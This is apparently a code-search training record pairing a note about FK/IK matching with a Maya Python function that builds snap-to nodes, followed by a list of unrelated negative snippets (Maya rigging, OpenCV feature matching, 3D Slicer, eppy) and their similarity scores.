r'{\"0\":{\"path1\":\"InvaderA1\",\"path2\":\"InvaderA2\"},\"1\":{\"path1\":\"InvaderB1\",\"path2\":\"InvaderB2\"},\"2\":{\"path1\":\"InvaderB1\",\"path2\":\"InvaderB2\"},\"3\":{\"path1\":\"InvaderC1\",\"path2\":\"InvaderC2\"},\"4\":{\"path1\":\"InvaderC1\",\"path2\":\"InvaderC2\"}}'\n }\n config['player 1'] = {\n 'margin': 20,\n 'speed': 3\n }\n\n with open(path, 'w') as configfile:\n config.write(configfile)", "def enter(self):\r\n self.turnOffLightboxes()\r\n self.installShortcutKeys()\r\n\r\n # Set parameter set node if absent\r\n self.selectParameterNode()\r\n self.editor.updateWidgetFromMRML()\r\n \r\n # If no segmentation node exists then create one so that the user does not have to create one manually\r\n if not self.editor.segmentationNodeID():\r\n newSegmentationNode = slicer.mrmlScene.CreateNodeByClass('vtkMRMLSegmentationNode')\r\n slicer.mrmlScene.AddNode(newSegmentationNode)\r\n self.editor.setSegmentationNode(newSegmentationNode)\r\n masterVolumeNodeID = self.getDefaultMasterVolumeNodeID()\r\n self.editor.setMasterVolumeNodeID(masterVolumeNodeID)", "def __init__(self, pklfile=None, preffile=_preffile):\n\n super(config_controller, self).__init__()\n self.pklfile = pklfile\n self.preffile = preffile" ]
[ "0.5719306", "0.5415949", "0.5388942", "0.5385029", "0.5336632", "0.5299819", "0.5200528", "0.5145229", "0.5140653", "0.51194525", "0.5079638", "0.50723904", "0.50585204", "0.50376135", "0.5010488", "0.49763772", "0.49707508", "0.49594924", "0.4954051", "0.4949411", "0.4947352", "0.4943901", "0.4934593", "0.49284354", "0.4923892", "0.4923892", "0.4923892", "0.4923892", "0.49217173", "0.4919505", "0.49172956", "0.49127904", "0.48924997", "0.48924997", "0.48924997", "0.48894072", "0.488293", "0.48692843", "0.4862807", "0.48608032", "0.48587546", "0.48572928", "0.4835457", "0.48325357", "0.48309034", "0.4825999", "0.4813325", "0.4805297", "0.4794852", "0.47910696", "0.47814056", "0.47706217", "0.47663957", "0.4762909", "0.4758006", "0.4757204", "0.47485957", "0.47461104", "0.47403783", "0.47369528", "0.47366032", "0.47349852", "0.47309327", "0.47273844", "0.47201413", "0.47201335", "0.4719329", "0.47168612", "0.47165364", "0.4716268", "0.4712119", "0.47087467", "0.47043702", "0.4704265", "0.46983424", "0.4697081", "0.46935275", "0.4692958", "0.46838683", "0.4681121", "0.4679565", "0.4674944", "0.4671631", "0.4668328", "0.46670285", "0.4664907", "0.46619886", "0.46619788", "0.4661319", "0.46597382", "0.46553832", "0.4652706", "0.46501863", "0.46484464", "0.46462658", "0.4645533", "0.46400067", "0.4628762", "0.46283883", "0.46265304" ]
0.5789509
0
This will be used for FK IK matching
def create_snapto_node(ctrl, jnt): snapto = ctrl+'_SNAPTO' if mc.objExists(snapto): jnt = utils.get_parent(snapto) mc.delete(snapto) snapto_grp = mc.duplicate(ctrl, po=1, n=ctrl+'_SNAPTO_GRP')[0] snapto = mc.duplicate(ctrl, po=1, n=ctrl+'_SNAPTO')[0] utils.set_attrs([snapto_grp, snapto], k=1, l=0) mc.parent(snapto_grp, jnt) mc.parent(snapto, snapto_grp) ua = mc.listAttr(snapto, ud=1) for a in ua: try: mc.setAttr(snapto+'.'+a, l=0) mc.deleteAttr(snapto+'.'+a) mc.setAttr(snapto_grp+'.'+a, l=0) mc.deleteAttr(snapto_grp+'.'+a) except: pass return snapto
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def ikFkMatch(\n namespace,\n ikfk_attr,\n ui_host,\n fks,\n ik,\n upv,\n ik_rot=None,\n key=None):\n\n # returns a pymel node on the given name\n def _get_node(name):\n # type: (Text) -> pm.nodetypes.Transform\n name = anim_utils.stripNamespace(name)\n if namespace:\n node = anim_utils.getNode(\":\".join([namespace, name]))\n else:\n node = anim_utils.getNode(name)\n\n if not node:\n mgear.log(\"Can't find object : {0}\".format(name), mgear.sev_error)\n\n return node\n\n # returns matching node\n def _get_mth(name):\n # type: (str) -> pm.nodetypes.Transform\n tmp = name.split(\"_\")\n tmp[-1] = \"mth\"\n query = \"_\".join(tmp)\n n = _get_node(query)\n\n if not n:\n mgear.log(\"Can't find mth object : {0} for {1}\".format(query, name), mgear.sev_comment)\n return _get_node(name)\n else:\n return n\n\n # get things ready\n fk_ctrls = [_get_node(x) for x in fks]\n fk_goals = [_get_mth(x) for x in fks]\n ik_ctrl = _get_node(ik)\n ik_goal = _get_mth(ik)\n upv_ctrl = _get_node(upv)\n\n if ik_rot:\n ik_rot_node = _get_node(ik_rot)\n ik_rot_goal = _get_mth(ik_rot)\n\n ui_node = _get_node(ui_host)\n o_attr = ui_node.attr(ikfk_attr)\n\n switch_to_fk = (o_attr.get() == 1.0)\n switch_to_ik = (not switch_to_fk)\n\n # sets keyframes before snapping\n if key:\n _all_controls = []\n _all_controls.extend(fk_ctrls)\n _all_controls.extend([ik_ctrl, upv_ctrl, ui_node])\n if ik_rot:\n _all_controls.extend([ik_rot_node])\n [cmds.setKeyframe(\"{}\".format(elem),\n time=(cmds.currentTime(query=True) - 1.0))\n for elem in _all_controls]\n\n # if is IKw then snap FK\n if switch_to_fk:\n\n world_matrices = []\n for src, _ in zip(fk_goals, fk_ctrls):\n world_matrices.append(getMatrix(src))\n\n o_attr.set(0.0)\n\n for mat, dst in zip(world_matrices, fk_ctrls):\n setMatrix(dst, mat)\n\n for mat, dst in zip(world_matrices, fk_ctrls):\n setMatrix(dst, mat)\n\n # if is FKw then sanp IK\n elif switch_to_ik:\n\n shoulder_mat = getMatrix(fk_goals[0])\n ik_mat = getMatrix(ik_goal)\n\n # transform.matchWorldTransform(ik_goal, ik_ctrl)\n if ik_rot:\n rot_mat = getMatrix(ik_rot_goal)\n # transform.matchWorldTransform(ik_rot_goal, ik_rot_node)\n\n upv_mat = getMatrix(fk_goals[2])\n\n o_attr.set(1.0)\n\n setMatrix(ik_ctrl, ik_mat)\n setMatrix(upv_ctrl, upv_mat)\n # for _ in range(10):\n # fk_ctrls[0].setMatrix(shoulder_mat, worldSpace=True)\n\n for _ in range(20):\n cmds.xform(fk_ctrls[0].name(), ws=True, matrix=shoulder_mat)\n if ik_rot:\n setMatrix(ik_rot_node, rot_mat)\n\n # transform.matchWorldTransform(fk_goals[1], upv_ctrl)\n # calculates new pole vector position\n start_end = (fk_goals[-1].getTranslation(space=\"world\") - fk_goals[1].getTranslation(space=\"world\"))\n start_mid = (fk_goals[2].getTranslation(space=\"world\") - fk_goals[1].getTranslation(space=\"world\"))\n\n dot_p = start_mid * start_end\n proj = float(dot_p) / float(start_end.length())\n proj_vector = start_end.normal() * proj\n arrow_vector = (start_mid - proj_vector) * 1.5\n arrow_vector *= start_end.normal().length()\n final_vector = (arrow_vector + fk_goals[2].getTranslation(space=\"world\"))\n upv_ctrl.setTranslation(final_vector, space=\"world\")\n\n # sets blend attribute new value\n # o_attr.set(1.0)\n roll_att = ui_node.attr(ikfk_attr.replace(\"blend\", \"roll\"))\n roll_att.set(0.0)\n\n setMatrix(ik_ctrl, ik_mat)\n if ik_rot:\n setMatrix(ik_rot_node, rot_mat)\n # upv_ctrl.setMatrix(upv_mat, worldSpace=True)\n for _ in range(20):\n cmds.xform(fk_ctrls[0].name(), ws=True, matrix=shoulder_mat)\n\n # sets keyframes\n if key:\n [cmds.setKeyframe(\"{}\".format(elem),\n time=(cmds.currentTime(query=True)))\n for elem in _all_controls]", "def test_fk():\n\n joints = [0.0, 2.9, 1.3, 4.2, 1.4, 0.0]\n\n path_planner = PathPlanner(\"manipulator\")\n\n pose = path_planner.get_fk(joints)\n\n print pose", "def matching(self, Y, K):\n\n ### sort data Y\n sidx = np.argsort(Y.SID)\n Y.SID = Y.SID[sidx]\n Y.Y = Y.Y[sidx,:]\n\n ### sort data K\n for kitem in K:\n sidx = np.argsort(kitem.SID)\n kitem.SID = kitem.SID[sidx]\n kitem.K = kitem.K[sidx,:][:,sidx]\n\n ### find reference set samples\n ### to boring to finish this crap....", "def ik_to_fk(node):\n ik_main_off = get_parent(node.ik_main_conn)\n fk_01_off = get_parent(node.fk_01_conn)\n fk_02_off = get_parent(node.fk_02_conn)\n fk_03_off = get_parent(node.fk_03_conn)\n\n ik_main_world_trans = get_world_trans(node.ik_main_conn)\n fk_01_world_trans = get_world_trans(node.fk_01_conn)\n ik_main_off_world_trans = get_world_trans(ik_main_off)\n fk_01_off_world_trans = get_world_trans(fk_01_off)\n fk_02_off_world_trans = get_world_trans(fk_02_off)\n fk_03_off_world_trans = get_world_trans(fk_03_off)\n\n # calculate base information\n def_len = (ik_main_off_world_trans - fk_01_off_world_trans).length()\n\n # Calculate ik direction\n ik_dir_01 = ik_main_off_world_trans - fk_01_off_world_trans\n ik_dir_02 = ik_main_world_trans - fk_01_world_trans\n\n ik_dir_rot = ik_dir_01.rotateTo(ik_dir_02).asEulerRotation()\n\n # Apply ik direction -> important to calculate correct pole rotations\n fk_01_rot_plugs = get_rot_plugs(node.fk_01_conn)\n for i, plug in enumerate(fk_01_rot_plugs):\n plug.setMAngle(oMa.MAngle(ik_dir_rot[i], oMa.MAngle.kRadians))\n\n # Calculate ik pole rotations\n ik_pole_world_mat = get_world_matrix(node.ik_pole_conn, 0)\n fk_03_world_inv_mat = get_world_inv_matrix(node.fk_01_conn, 0)\n\n ik_pole_rot_mat = ik_pole_world_mat * fk_03_world_inv_mat\n\n ik_pole_vec = oMa.MTransformationMatrix(ik_pole_rot_mat).translation(oMa.MSpace.kWorld)\n ik_pole_vec.y = 0\n\n ik_pole_rot = oMa.MVector.kZaxisVector.rotateTo(ik_pole_vec).asEulerRotation()\n\n # Calculate ik rotations\n tri_a_len = (fk_02_off_world_trans - fk_01_off_world_trans).length()\n tri_b_len = (fk_03_off_world_trans - fk_02_off_world_trans).length()\n tri_c_len = (ik_main_world_trans - fk_01_world_trans).length()\n\n if tri_c_len >= def_len:\n fk_02_angle = 0\n fk_01_angle = 0\n else:\n fk_02_angle = math.pi - solve_triangle(tri_a_len, tri_b_len, tri_c_len, \"C\")\n fk_01_angle = -solve_triangle(tri_a_len, tri_b_len, tri_c_len, \"B\")\n\n # Add rotations together\n fk_01_temp = oMa.MEulerRotation(fk_01_angle, ik_pole_rot.y, 0)\n\n ik_dir_mat = compose_mat(ik_dir_rot)\n fk_01_mat = compose_mat(fk_01_temp)\n rot_mat = fk_01_mat * ik_dir_mat\n\n # Apply everything\n fk_01_rot = get_rot_from_mat(rot_mat)\n fk_02_rot = (fk_02_angle, 0, 0)\n\n fk_01_rot_plugs = get_rot_plugs(node.fk_01_conn)\n for i, plug in enumerate(fk_01_rot_plugs):\n plug.setMAngle(oMa.MAngle(fk_01_rot[i], oMa.MAngle.kRadians))\n\n fk_02_rot_plugs = get_rot_plugs(node.fk_02_conn)\n for i, plug in enumerate(fk_02_rot_plugs):\n if not plug.isLocked:\n plug.setMAngle(oMa.MAngle(fk_02_rot[i], oMa.MAngle.kRadians))\n\n # Calculate ankle rotation\n fk_03_rot = rot_world_space_to_local_space(node.ik_main_conn, get_parent(node.fk_03_conn))\n\n fk_03_rot_plugs = get_rot_plugs(node.fk_03_conn)\n for i, plug in enumerate(fk_03_rot_plugs):\n plug.setMAngle(oMa.MAngle(fk_03_rot[i], oMa.MAngle.kRadians))", "def test_match_table_post(self):\n pass", "def key_fk(*args):\n\n robots = get_robot_roots()\n if not robots:\n pm.warning('No robots selected')\n return\n\n for robot in robots:\n # If the robot's IK attribute is on, switch the robot to\n # FK mode before proceeding\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n\n if pm.getAttr(target_ctrl_path + '.ik'):\n switch_to_fk(robot)\n\n # We first check if the target/tool controller transformation and\n # orientation is already aligned with the FK chain. If so, it\n # indicates that we're performing an IK to FK switch, and we\n # keyframe its position and orientation directly, without\n # snapping the IK control to the FK hierarchy. This is to avoid\n # unneccessarily changing the controllers Euler Angle rotation\n # representation that can cause unpredictable behavior between frames\n\n if pm.objExists(tool_ctrl_path):\n ctrl_ik = tool_ctrl_path\n ctrl_fk = format_path(__TOOL_CTRL_FK_PATH, robot)\n\n # If robot doesn't have a tool controller, use target_CTRL.\n else:\n ctrl_ik = target_ctrl_path\n ctrl_fk = format_path(__TCP_HDL_PATH, robot)\n\n if not _ik_and_fk_aligned(ctrl_ik, ctrl_fk):\n _snap_ik_target_to_fk(robot)\n\n # Key all FK elements\n try:\n pm.setKeyframe(format_path(__A1_FK_CTRL_PATH, robot),\n attribute='rotateY')\n pm.setKeyframe(format_path(__A2_FK_CTRL_PATH, robot),\n attribute='rotateX')\n pm.setKeyframe(format_path(__A3_FK_CTRL_PATH, robot),\n attribute='rotateX')\n pm.setKeyframe(format_path(__A4_FK_CTRL_PATH, robot),\n attribute='rotateZ')\n pm.setKeyframe(format_path(__A5_FK_CTRL_PATH, robot),\n attribute='rotateX')\n pm.setKeyframe(format_path(__A6_FK_CTRL_PATH, robot),\n attribute='rotateZ')\n\n # Key visibility of FK controllers\n for i in range(6):\n pm.setKeyframe(format_path(__FK_CTRLS_PATH, robot),\n attribute='visibility')\n except:\n pm.warning('Error setting FK keys in FK mode')\n\n # Key all IK elements\n try:\n pm.setKeyframe(target_ctrl_path, attribute='ik')\n pm.setKeyframe(target_ctrl_path, attribute='v', value=0)\n\n if pm.objExists(tool_ctrl_path):\n pm.setKeyframe(tool_ctrl_path, attribute='v')\n\n # Key tool controllers\n if pm.checkBox('cb_keyToolCtrl', query=True, value=True):\n if pm.objExists(tool_ctrl_path):\n pm.setKeyframe(tool_ctrl_path, attribute='translate')\n pm.setKeyframe(tool_ctrl_path, attribute='rotate')\n else:\n pm.setKeyframe(target_ctrl_path, attribute='translate')\n pm.setKeyframe(target_ctrl_path, attribute='rotate')\n\n except:\n pm.warning('Error setting IK keys in FK mode')", "def match_keypoints(desc1, desc2, k=2, thresh=.9, matchertype=None):\n if not matchertype:\n # default is brute forcce\n matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n matches = matcher.knnMatch(desc1, desc2, k=3)\n print(matches)\n\n elif matchertype == \"FlannORB\":\n #\n FLANN_INDEX_LSH = 6\n search_params = dict(checks=50)\n index_params = dict(algorithm=FLANN_INDEX_LSH,\n table_number=6, # 12\n key_size=12, # 20\n multi_probe_level=1) # 2\n matcher = cv2.FlannBasedMatcher(index_params, search_params)\n matches = matcher.knnMatch(desc1, desc2, k=2)\n\n elif matchertype == \"FlannSURF\":\n FLANN_INDEX_KDTREE = 2\n index_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=500)\n search_params = dict(checks=50)\n matcher = cv2.FlannBasedMatcher(index_params, search_params)\n matches = matcher.knnMatch(desc1, desc2, k=2)\n\n goodmatches = []\n for m, n in matches:\n if m.distance < thresh * n.distance:\n goodmatches.append(m)\n return goodmatches", "def match(self, dc):\n raise NotImplemented", "def secondary_keys(self):", "def match(self, other):", "def correspondence_points(img1, img2, tag='c'):\n if len(img1.shape) == 3:\n img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)\n if len(img2.shape) == 3:\n img2 = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)\n\n detector = cv2.SURF(800)\n norm = cv2.NORM_L2\n flann_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\n matcher = cv2.FlannBasedMatcher(flann_params, {}) # bug : need to pass empty dict (#1329)\n kp1, desc1 = detector.detectAndCompute(img1, None)\n kp2, desc2 = detector.detectAndCompute(img2, None)\n raw_matches = matcher.knnMatch(desc1, trainDescriptors = desc2, k = 2) #2\n p1, p2, kp_pairs = filter_matches(kp1, kp2, raw_matches)\n\n if len(p1) >= 4:\n H, status = cv2.findHomography(p1, p2, cv2.RANSAC, 5.0)\n print '%d / %d inliers/matched' % (np.sum(status), len(status))\n status = status.reshape(-1) # flatten\n p1 = p1[status == 1]\n p2 = p2[status == 1]\n kp_pairs = [kp_pairs[i] for i in range(len(kp_pairs)) if status[i] == 1]\n else:\n # Just depend on the thresholding for filtering matches\n p1, p2, kp_pairs = filter_matches(kp1, kp2, raw_matches, ratio=0.3)\n\n draw_correspondence_points(img1, img2, kp_pairs, tag=tag)\n return p1, p2, kp_pairs", "def newmatch(self):\n\n objectpnts = self.kif.getObjectPcd()\n # normals\n objectnormals = tools.estimatenormals(objectpnts)", "def match_source_key(self, match):\n raise NotImplementedError", "def needleMatching(self):\r\n # productive\r\n profprint()\r\n modelNodes = slicer.mrmlScene.GetNodesByClass('vtkMRMLModelNode')\r\n nbNode = modelNodes.GetNumberOfItems()\r\n result = []\r\n found = []\r\n # print nbNode\r\n for nthNode in range(nbNode):\r\n node = slicer.mrmlScene.GetNthNodeByClass(nthNode, 'vtkMRMLModelNode')\r\n if node.GetID() not in found and node.GetAttribute('type') != 'Validation':\r\n dist = []\r\n polydata = node.GetPolyData()\r\n if polydata != None:\r\n bounds = polydata.GetBounds()\r\n for nthNode2 in range(nbNode):\r\n node2 = slicer.mrmlScene.GetNthNodeByClass(nthNode2, 'vtkMRMLModelNode')\r\n if node2.GetID() not in found and node2.GetAttribute('type') == 'Validation':\r\n polydata2 = node2.GetPolyData()\r\n if polydata2 != None and polydata2.GetNumberOfPoints() > 100 and polydata.GetNumberOfPoints() > 100:\r\n tipDistance = self.distTip(int(node.GetID().strip('vtkMRMLModelNode')) , int(node2.GetID().strip('vtkMRMLModelNode')))\r\n baseDistance = self.distBase(int(node.GetID().strip('vtkMRMLModelNode')) , int(node2.GetID().strip('vtkMRMLModelNode')))\r\n name = node.GetName()\r\n manualName = name.lstrip('auto-seg_').lstrip('manual-seg_').lstrip('obturator-seg_').lstrip('0123456789').lstrip('-ID-vtkMRMLModelNode').lstrip('0123456789-')\r\n if manualName==node2.GetName(): dist.append([tipDistance, node2.GetID(), node2.GetName()])\r\n # print tipDistance\r\n if dist != []:\r\n match = [min(dist)[0], min(dist)[1], node.GetID(), min(dist)[2]]\r\n result.append(match)\r\n found.append(min(dist)[1])\r\n found.append(node.GetID())\r\n node.GetDisplayNode().SetSliceIntersectionVisibility(1)\r\n # print result\r\n return result", "def findMatchesBetweenImages(image_1, image_2):\n # matches - type: list of cv2.DMath\n matches = None\n # image_1_kp - type: list of cv2.KeyPoint items.\n image_1_kp = None\n # image_1_desc - type: numpy.ndarray of numpy.uint8 values.\n image_1_desc = None\n # image_2_kp - type: list of cv2.KeyPoint items.\n image_2_kp = None\n # image_2_desc - type: numpy.ndarray of numpy.uint8 values.\n image_2_desc = None\n # WRITE YOUR CODE HERE.\n\n sift = cv2.ORB_create()\n image_1_kp, image_1_desc = sift.detectAndCompute(image_1, None)\n image_2_kp, image_2_desc = sift.detectAndCompute(image_2, None)\n\n # bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n # matches = bf.match(image_1_desc, image_2_desc)\n # matches = sorted(matches, key = lambda x:x.distance)\n # matches = matches[:10]\n\n bf = cv2.BFMatcher()\n matches = bf.knnMatch(image_1_desc, image_2_desc, k=2)\n\n # Apply ratio test\n good = []\n for m, n in matches:\n print(m.distance, n.distance, m.distance < .75*n.distance)\n if m.distance < (0.75 * n.distance):\n good.append([m])\n\n # We coded the return statement for you. You are free to modify it -- just\n # make sure the tests pass.\n print(len(good), good)\n return image_1_kp, image_2_kp, matches\n # END OF FUNCTION.", "def needleMatching(self):\n #productive\n profprint()\n modelNodes=slicer.mrmlScene.GetNodesByClass('vtkMRMLModelNode')\n nbNode=modelNodes.GetNumberOfItems()\n result=[]\n found=[]\n #print nbNode\n for nthNode in range(nbNode):\n node=slicer.mrmlScene.GetNthNodeByClass(nthNode,'vtkMRMLModelNode')\n if node.GetID() not in found and node.GetAttribute('type')!='Validation':\n dist=[]\n polydata = node.GetPolyData()\n if polydata!=None:\n bounds = polydata.GetBounds()\n for nthNode2 in range(nbNode):\n node2=slicer.mrmlScene.GetNthNodeByClass(nthNode2,'vtkMRMLModelNode')\n if node2.GetID() not in found and node2.GetAttribute('type')=='Validation':\n polydata2 = node2.GetPolyData()\n if polydata2!=None and polydata2.GetNumberOfPoints()>100 and polydata.GetNumberOfPoints()>100:\n\n axialDistance=self.distTip( int(node.GetID().strip('vtkMRMLModelNode')) , int(node2.GetID().strip('vtkMRMLModelNode')))\n \n dist.append([axialDistance,node2.GetID()])\n # print axialDistance\n \n if dist!=[]:\n match=[min(dist)[0],min(dist)[1],node.GetID()]\n result.append(match)\n found.append(min(dist)[1])\n found.append(node.GetID()) \n node.GetDisplayNode().SetSliceIntersectionVisibility(1)\n # print result\n return result", "def find(self, image, k=None, ratio=None):\n if not self._targets:\n return []\n k = 2 if k is None else k\n ratio = 0.75 if ratio is None else ratio\n keypoints, descriptors = self._detector.detectAndCompute(image, None)\n if len(keypoints) < self.min_match_count:\n return []\n matches = self._matcher.knnMatch(descriptors, k=int(k))\n matches = [m[0] for m in matches if len(m) == 2 and m[0].distance < m[1].distance * ratio]\n if len(matches) < self.min_match_count:\n return []\n matches_by_id = [[] for _ in xrange(len(self._targets))]\n for m in matches:\n matches_by_id[m.imgIdx].append(m)\n tracked = []\n for imgIdx, matches in enumerate(matches_by_id):\n if len(matches) < self.min_match_count:\n continue\n target = self._targets[imgIdx]\n p0 = [target.keypoints[m.trainIdx].pt for m in matches]\n p1 = [keypoints[m.queryIdx].pt for m in matches]\n p0, p1 = np.float32((p0, p1))\n H, status = cv2.findHomography(p0, p1, cv2.RANSAC, 3.0)\n status = status.ravel() != 0\n if status.sum() < self.min_match_count:\n continue\n p0, p1 = np.int32((p0, p1))\n inliers = [((x0, y0), (x1, y1)) for (x0, y0), (x1, y1), s in zip(p0, p1, status) if s]\n outliers = [((x0, y0), (x1, y1)) for (x0, y0), (x1, y1), s in zip(p0, p1, status) if not s]\n quad = cv2.perspectiveTransform(target.quad.reshape(1, -1, 2), H).reshape(-1, 2)\n track = TrackedTarget(target=target, image=image, inliers=inliers, outliers=outliers, H=H, quad=quad)\n tracked.append(track)\n tracked.sort(key = lambda t: len(t.inliers), reverse=True)\n return tracked", "def match_features(kp1, kp2, des1, des2):\n FLANN_INDEX_LSH = 6\n index_params= dict(algorithm = FLANN_INDEX_LSH,\n table_number = 6, # 12\n key_size = 12, # 20\n multi_probe_level = 2) #2\n\n search_params = dict(checks=50) # or pass empty dictionary\n flann = cv2.FlannBasedMatcher(index_params,search_params)\n matches = flann.knnMatch(des1,des2,k=2)\n good = []\n for (m,n) in matches:\n if m.distance < 0.8*n.distance: ## Lowe's ratio imp for tuning\n good.append(m)\n\n if len(good) < 20:\n return []\n return good", "def secondary_keys_dicts(self):", "def key_ik_fk(*args):\n if not pm.window(\"mimic_win\", exists=True):\n return\n\n current_tab = pm.tabLayout('switcher_tab_layout',\n query=True,\n selectTabIndex=True)\n\n try:\n if current_tab == 1:\n key_ik()\n elif current_tab == 2:\n key_fk()\n except:\n pm.warning('Error keying IK/FK')", "def delete_ik_fk_keys(*args):\n if not check_robot_selection():\n pm.warning('No robots selected; ' \\\n 'Select at least one robot.')\n\n keyed_attrs = {__TARGET_CTRL_PATH: ['ik',\n 'visibility',\n 'ikSolution1',\n 'ikSolution2',\n 'ikSolution3'],\n __FK_CTRLS_PATH: ['visibility'],\n __A1_FK_CTRL_PATH: ['rotateY'],\n __A2_FK_CTRL_PATH: ['rotateX'],\n __A3_FK_CTRL_PATH: ['rotateX'],\n __A4_FK_CTRL_PATH: ['rotateZ'],\n __A5_FK_CTRL_PATH: ['rotateX'],\n __A6_FK_CTRL_PATH: ['rotateZ']}\n\n robots = get_robot_roots()\n\n current_frame = pm.currentTime()\n for robot in robots:\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n # Check if there's a keyframe set on the target_CTRL.ik attribute\n key = pm.keyframe(target_ctrl_path,\n attribute='ik',\n query=True,\n time=current_frame)\n\n # If there is no keyframe set on the IK attribute, continue to the\n # next robot\n if not key:\n pm.warning('{} has no IK|FK keyframe at frame {}' \\\n .format(robot, current_frame))\n continue\n\n # If there is a keyframe on the IK attribute, we also check if there's\n # a keyframe on an FK controller as well, as we only consider there to\n # be a proper IK or FK keyframe if both are true\n # Note, we only need to check a single FK controller as they should all\n # be keyframed (or not) together\n fk_test_handle_path = format_path(__A1_FK_CTRL_PATH + '.rotateY', robot)\n fk_key = pm.keyframe(fk_test_handle_path,\n query=True,\n time=current_frame)\n # If there is no keyframe set on the FK controller attribute,\n # continue to the next robot\n if not fk_key:\n pm.warning('{} has no IK|FK keyframe at frame {}' \\\n .format(robot, current_frame))\n continue \n\n for obj in keyed_attrs:\n for attr in keyed_attrs[obj]:\n pm.cutKey(format_path(obj, robot),\n time=current_frame,\n attribute=attr,\n option=\"keys\")\n\n if pm.objExists(tool_ctrl_path):\n pm.cutKey(tool_ctrl_path,\n time=current_frame,\n attribute='visibility',\n option=\"keys\")\n\n if pm.checkBox('cb_keyToolCtrl', query=True, value=True):\n if pm.objExists(tool_ctrl_path):\n pm.cutKey(tool_ctrl_path,\n time=current_frame,\n attribute='translate',\n option=\"keys\")\n pm.cutKey(tool_ctrl_path,\n time=current_frame,\n attribute='rotate',\n option=\"keys\")\n else:\n pm.cutKey(target_ctrl_path,\n time=current_frame,\n attribute='translate',\n option=\"keys\")\n pm.cutKey(target_ctrl_path,\n time=current_frame,\n attribute='rotate',\n option=\"keys\")", "def altloc_match(self, other: AtomKey) -> bool:\n ...", "def visulize_matches(matches, k2, k1, img2, img1):\n\n import scipy as sp\n img2 = cv.cvtColor(img2, cv.COLOR_GRAY2BGR)\n h1, w1 = img1.shape[:2]\n h2, w2 = img2.shape[:2]\n view = sp.zeros((max(h1, h2), w1 + w2, 3), sp.uint8)\n view[:h1, :w1, :] = img1 \n view[:h2, w1:, :] = img2\n view[:, :, 1] = view[:, :, 0] \n view[:, :, 2] = view[:, :, 0]\n\n for m in matches:\n m = m[0]\n # draw the keypoints\n # print m.queryIdx, m.trainIdx, m.distance\n color = tuple([sp.random.randint(0, 255) for _ in xrange(3)])\n pt1 = (int(k1[m.queryIdx].pt[0]), int(k1[m.queryIdx].pt[1]))\n pt2 = (int(k2[m.trainIdx].pt[0] + w1), int(k2[m.trainIdx].pt[1]))\n\n cv.line(view, pt1, pt2, color)\n return view", "def test_getCpfRelations(self):\n pass", "def lookup(self, key):", "def relationships(self):", "def keys(targets):", "def matches(self):\n pass", "def theidfobjectmentioningobjs(idfindex, keyindex, objindex):\n idf, edges = eppystuff.an_idfedges(idfindex)\n objnames = idf_helpers.idfobjectkeys(idf)\n objname = objnames[keyindex]\n idfobjects = idf.idfobjects[objname]\n idfobject = idfobjects[objindex]\n from eppy import walk_hvac\n try:\n idfobjectname = idfobject.Name\n except BadEPFieldError as e:\n idfobjectname = idfobject.Zone_Name\n \n nextnodes = walk_hvac.nextnode(edges, idfobjectname)\n nextobjs = [eppystuff.hvacname2idfobj(idf, nnode) for nnode in nextnodes]\n keyobjids = [eppystuff.idfobjectindices(idf, nobj) for nobj in nextobjs]\n nurls = [\"../../%s/%s\" % (key_id, obj_id) for key_id, obj_id in keyobjids]\n nextlinks = ['<a href=%s>%s</a>' % (url, nnode)\n for nnode, url in zip(nextnodes, nurls)]\n firstlines = [\n \"HVAC connections from %s named '%s'\" % (objname, idfobjectname),\n \"\",\n \"Next Objects\",\n ]\n betweenlines = [\"\", \"Previous Objects\"]\n prevnodes = walk_hvac.prevnode(edges, idfobjectname)\n prevobjs = [eppystuff.hvacname2idfobj(idf, pnode) for pnode in prevnodes]\n keyobjids = [eppystuff.idfobjectindices(idf, nobj) for nobj in prevobjs]\n try:\n purls = [\"../../%s/%s\" % (key_id, obj_id) \n for key_id, obj_id in keyobjids]\n except TypeError as e:\n purls = []\n prevlinks = ['<a href=%s>%s</a>' % (url, pnode)\n for pnode, url in zip(prevnodes, purls)]\n # image snippet\n onlythis = [idfobjectname, ] + nextnodes + prevnodes\n trimmed = eppystuff.trimedges(edges, onlythis)\n from eppy.useful_scripts import loopdiagram\n imgname = '%s_%s_%s' % (idfindex, keyindex, objindex)\n eppystuff.save_imagesnippets(IMGFOLDER,imgname, trimmed)\n imgline = ['<img src=\"../../../../../static/%s.png\" alt=\"snippet\">' % (imgname, )]\n html = '<br>'.join(firstlines + nextlinks + betweenlines + prevlinks + imgline)\n return html", "def keyEquivalent( self ):\n\t\treturn None", "def fk_to_ik(node):\n # Get relevant data\n ik_pole_off = get_parent(node.ik_pole_conn)\n\n world_trans_ik_pole_off = get_world_trans(ik_pole_off)\n world_trans_fk_01 = get_world_trans(node.fk_01_conn)\n world_trans_fk_02 = get_world_trans(node.fk_02_conn)\n world_trans_fk_03 = get_world_trans(node.fk_03_conn)\n world_trans_ik_pole = get_world_trans(node.ik_pole_conn)\n\n world_rot_fk_03 = get_world_rot(node.fk_03_conn)\n\n # calculate ik pole position\n ik_pole_mid_point = (world_trans_fk_01 + world_trans_fk_03) / 2\n ik_pole_base = world_trans_fk_02 - ik_pole_mid_point\n\n # Handle the case when the leg is fully stretched\n if ik_pole_base.length() <= 0.0001:\n rot_fk_01 = get_rot_as_quat(node.fk_01_conn)\n rot_fk_02 = get_rot_as_quat(node.fk_02_conn)\n\n rot = rot_fk_01 * rot_fk_02\n\n ik_pole_base = oMa.MVector(2 * (rot.x * rot.z + rot.w * rot.y),\n 2 * (rot.y * rot.z - rot.w * rot.x),\n 1 - 2 * (rot.x * rot.x + rot.y * rot.y))\n\n ik_pole_len = (world_trans_ik_pole - world_trans_fk_02).length()\n\n pos_ik_pole = world_trans_fk_02 + ik_pole_base.normalize() * ik_pole_len - world_trans_ik_pole_off\n\n # Get the destination MPlugs\n ik_main_trans_plugs = get_trans_plugs(node.ik_main_conn)\n 